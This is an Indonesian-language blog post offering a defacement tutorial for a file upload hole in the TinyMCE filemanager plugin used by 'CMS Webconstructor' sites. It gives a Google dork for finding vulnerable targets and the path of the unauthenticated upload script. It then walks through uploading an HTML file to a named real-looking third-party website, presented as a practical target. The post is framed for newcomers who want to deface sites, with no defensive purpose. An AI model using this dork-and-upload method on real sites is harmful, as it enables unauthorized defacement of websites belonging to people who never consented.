CMS Webconstructor File Upload Vulnerability
Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v
Bahan :
- Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
- Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php
Sekarang kita mulai prakteknya.
- Buka google dan cari target dengan dork diatas.
- Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
- masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
- Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area
CMS Webconstructor File Upload Vulnerability
Reviewed by MrNewbie
on
09:33
Rating:
Reviewed by MrNewbie
on
09:33
Rating:
![[TUTORIAL] Download Video Dari Youtube Tanpa Guna Youtube Downloader](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxfhkqOroHvbqqRZw9Zcg3a3-kUt7ACOS2zmoogRSXtEH_t31pJIsQA9xElscYWH2oS5WmJyYPjgFIirFSgHWBFrmkscJzP18CTfxQrPYcWgamDH7Qxvo1NSzqRhFhDNfKQGyURVTbgGLP/s72-c/untitled.JPG)
![[Tutorial] Cara 'RUN' Havij didalam Ubuntu](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqM8S-5nTof9uMvXt2vbbYxfQIg7rk253y5KfGUPb1wInXYQGsBEnvJpa4geTeKeGZlU4uAE5KEcC2HdnvJfueOhX37g5j9hd9Bd4J6nDphC7UbY5LBd6tAPhdPx2q4XTDEI9FD0qeOEn6/s72-c/Screenshot+from+2013-05-05+02:54:24.png)
No comments: